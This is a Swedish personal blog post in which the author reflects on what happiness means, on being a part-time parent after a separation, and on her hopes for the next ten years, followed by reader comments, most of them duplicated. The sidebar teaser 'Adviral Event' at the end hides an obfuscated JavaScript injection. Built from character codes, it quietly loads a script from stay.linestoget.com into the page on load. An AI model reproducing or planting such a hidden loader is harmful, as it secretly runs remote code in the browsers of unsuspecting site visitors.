-Vad är lycka för dig?

image

 

Godkväll fining!

Villen underbar dag vi har haft. Lugnt skönt, några timmars jobb & förberedelse inför morgondagens bröllopsmässa. En mysig fika och en catch up, med en utav mina äldsta vänner från Öland, fantastiska Linda! <3

Jag  fick mig en tankeställare i veckan då en vän till mig ställde mig frågan vad som gör mig lycklig om 10år….

-Vad gör mig lycklig om 10år?

Det är en svår fråga. Vad är lycka egentligen för mig? Hmm…

Av tidigare erfarenheter så tar jag inte någon eller någonting för givet. Lycka för mig är en inre ro och harmoni. Att få känna mig tillfredsställd med livet ganska så generellt….

Jag  ångrar sällan någonting som jag har gjort. Men det händer att jag ångrar saker som jag inte har gjort.

Vad det gäller misstag, snedsteg osv oavsett om det gäller relationer, affärer, beslut, m.m så har jag ett motto som jag själv lever efter,

-En gång är helt okay, men två gånger är två gånger för mycket.

Jag menar, gör man ett misstag, kommer till insikt med det, och tar med sig det som en erfarenhet och inte gör om det igen så är det som sagt helt okay…

Att vara lycklig är ju vad livet går ut på. Självklart så kan man inte alltid vara på topp, inte alltid känna sig lycklig, men för Guds skull slösa inte bort din tid & ditt liv på att gå omkring och vara ”halv lycklig” det är det alldeles för kort för!

Ludvig fyller mitt liv med Lycka. Den kärlek, glädje och styrka som han ger mig är oersättlig! Att få vara förälder, i mitt fall, mamma är det största & bästa som har hänt mig.

Att vara ”varannan vecka mamma” är ingenting som jag har valt. Jag ogillar det skarpt!

Om jag hade fått välja så hade jag haft honom på heltid, varje dag. Jag tror att ni är ganska många där ute som kan känna igen er i den känslan…. Men samtidigt är det ju så att det vore egoistisk. Alla  barn har rätt till båda  sina föräldrar…. Därför har jag förlikat mig med det, och helhjärtat gått in för att göra det bästa utav situationen. Jag håller en bra relation till Ludvigs pappa. Jag har helt lagt mina känslor och den bitterhet som jag just vid separationen kände, åt sidan. Tillsammans kompromissar vi, diskuterar & hjälps åt. Vi håller en enad front inför lilleman.

image

Foto: Malin Björkholm

Lycka för mig är som jag tidigare skrev att känna en inre harmoni och en tillfredställelse. Självklart så fyller jag mina ”barnlediga veckor” med extremt mycket jobb, ett socialt nätverk, olika projekt och ser samtidigt till att jag har fullt upp hela tiden… Just för att kompensera upp det tomrum som jag känner under min ”barnfria” vecka.

Men jag känner mig lite vilsen och inte 100% lycklig. Jag saknar någonting… Jag kan inte riktigt sätta ord på vad det är. Det är en pusselbit som saknas och behöver sättas på sin plats. Missförstå mig rätt nu, jag menar inte att jag är deprimerad eller missnöjd…. Men någonting saknas!

Jag ser med nyfikenhet fram emot vad kommande 10 år har att erbjuda. Jag har en magkänsla som säger mig att den där pusselbiten kommer att falla på sin plats.

Jag tror också på ödet. Allting har en mening.

Jag har mina mål och visioner vad det gäller mina företag.  Jag kommer att jobba stenhårt för att uppnå dessa. För mig är inte frågan OM jag kommer dit, utan NÄR jag kommer dit 😉

 

image

Jag hoppas innerligt att vi ska få vara friska & inte drabbas utav Ohälsa.

Jag är personligen livrädd för cancer! Jag har tyvärr sista året varit med om att cancern knackat på dörren bland både familj & vänner. Av respekt mot just dom så går jag inte in mer på det. Jag ber till Gud att det ska gå vägen och att vi ska få många fler är tillsammans.

Min bästa Vän förlorade nyligen sin son. Livet kommer aldrig att bli detsamma efter det…. En sorg som man på något sätt får lära sig att leva med. Obeskrivligt, så fruktansvärt att jag inte kan sätta ord på det.

När någonting fruktansvärt händer så stannat plötsligt livet upp. Man får oftast ett annat perspektiv till det mesta. Vad är viktigt egentligen, vem eller vilka betyder verkligen någonting….. Hmm…

Jag kommer att lägga kommande 10 år på att fortsätta utvecklas som människa, omge mig med personer som verkligen betyder någonting. Visa mina nära & kära hur mycket ni faktiskt betyder för mig. Uppfostra Ludvig på bästa sätt, för att förbereda honom så gott jag kan på vuxenlivet, med allt vad det innebär. Överösa honom med kärlek, så att han vet att vad som än händer, så ska han alltid känna sig älskad….

-Vad är lycka för dig? Vad tror du gör dig lycklig  om 10 år? Skriv gärna och berätta 🙂

Detta blev ett lite tyngre inlägg. Jag måste verkligen passa på att tacka er alla som följer mig här på Bloggen. Ni är fantastiska och värdefulla… Glöm aldrig det!

Massa kärlek till er! Kramar My Martens

14 Komentarer

 1. Vet inte om du sett filmen Hallå, hallå, men där säger huvudpersonen om sitt liv: ”Nöjd, men inte mätt” Tycker d är så bra ?

 2. Vet inte om du sett filmen Hallå, hallå, men där säger huvudpersonen om sitt liv: ”Nöjd, men inte mätt” Tycker d är så bra 🙂

 3. Att ha sig en egen familj, men alla kan tyvärr inte få den där lyckan i livet. Man får glädja sig åt att andra har det bra.
  Sköt om dig, My.
  /Mvh Daniel.

 4. Att ha sig en egen familj, men alla kan tyvärr inte få den där lyckan i livet. Man får glädja sig åt att andra har det bra.
  Sköt om dig, My.
  /Mvh Daniel.

 5. Jättefint skrivet och vackra ord. Ord som får en att tänka efter. För det där med lycka är inte alltid så himla lätt. Vad som är viktigt tror jag är att man ser utifrån sig själv och sina förutsättningar och vad ”jag” behöver för att vara lycklig, inte vad som förväntas av en. Det som gör mig lycklig är familjen, och jag hoppas innerligt inne att vi får vara friska, för livet är skört och man vet aldrig vad som kan hända. Ta hand om dig!

 6. Jättefint skrivet och vackra ord. Ord som får en att tänka efter. För det där med lycka är inte alltid så himla lätt. Vad som är viktigt tror jag är att man ser utifrån sig själv och sina förutsättningar och vad ”jag” behöver för att vara lycklig, inte vad som förväntas av en. Det som gör mig lycklig är familjen, och jag hoppas innerligt inne att vi får vara friska, för livet är skört och man vet aldrig vad som kan hända. Ta hand om dig!

 7. Om jag skulle bryta ner mitt liv i tegelstenar om tio år så är hälsan för mina nära grunden till allt ….det är ju dem jag vill dela glädjen med…
  Fina ord du ger oss!
  Kram

 8. Om jag skulle bryta ner mitt liv i tegelstenar om tio år så är hälsan för mina nära grunden till allt ….det är ju dem jag vill dela glädjen med…

  Fina ord du ger oss!
  Kram

 9. Oj. Om tio år.
  Jag är 22 nu.
  Jag jobbar heltid som entreprenadingenjör. Har Sambo o husägare.
  Om tio år vill jag fortfarande jobba100%. Men jag önskar också mig ha ett eller flera underbara barn. En man jag älskar(som nu). Ett härligt hem och en fortsatt bra relation med familj.
  Jag önskar mig fler vänner. Ett välmående och hälsosamt liv där jag också får vara i stallet några dagar i veckan.
  Kram på dig kloka my!

 10. Oj. Om tio år.
  Jag är 22 nu.
  Jag jobbar heltid som entreprenadingenjör. Har Sambo o husägare.
  Om tio år vill jag fortfarande jobba100%. Men jag önskar också mig ha ett eller flera underbara barn. En man jag älskar(som nu). Ett härligt hem och en fortsatt bra relation med familj.
  Jag önskar mig fler vänner. Ett välmående och hälsosamt liv där jag också får vara i stallet några dagar i veckan.
  Kram på dig kloka my!

 11. Om tio år är jag ännu lyckligare än vad jag är nu, inte för att jag är olycklig nu men för att jag blir lyckligare för varje dag som går. För varje dag jag får vakna upp med min fina familj blir jag lyckligare. Jag har förhoppningsvis kanske fått smaka på livets efterrätt och fått barnbarn. Vilket kommer känns helt otroligt fantastiskt. Om tio år är jag 42år och min äldsta son är 27år. Jag får äran att följa mina barn länge i livet hoppas jag. Jag hoppas jag blir en ung pigg och livsglad farmor och mormor. Om tio år så har jag lyckats bygga upp mitt varumärke och jobbat hårt, då äntligen kanske jag kan ta den där resan till Paris med min kärlek. Dricka ett glas vin och bli påmind om just den här frågan du ställde för ”tio år sen” och bli påmind om hur lycklig jag faktiskt är!
  Puss fina My <3 Jag ringer någon dag…

 12. Om tio år är jag ännu lyckligare än vad jag är nu, inte för att jag är olycklig nu men för att jag blir lyckligare för varje dag som går. För varje dag jag får vakna upp med min fina familj blir jag lyckligare. Jag har förhoppningsvis kanske fått smaka på livets efterrätt och fått barnbarn. Vilket kommer känns helt otroligt fantastiskt. Om tio år är jag 42år och min äldsta son är 27år. Jag får äran att följa mina barn länge i livet hoppas jag. Jag hoppas jag blir en ung pigg och livsglad farmor och mormor. Om tio år så har jag lyckats bygga upp mitt varumärke och jobbat hårt, då äntligen kanske jag kan ta den där resan till Paris med min kärlek. Dricka ett glas vin och bli påmind om just den här frågan du ställde för ”tio år sen” och bli påmind om hur lycklig jag faktiskt är!

  Puss fina My <3 Jag ringer någon dag…

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/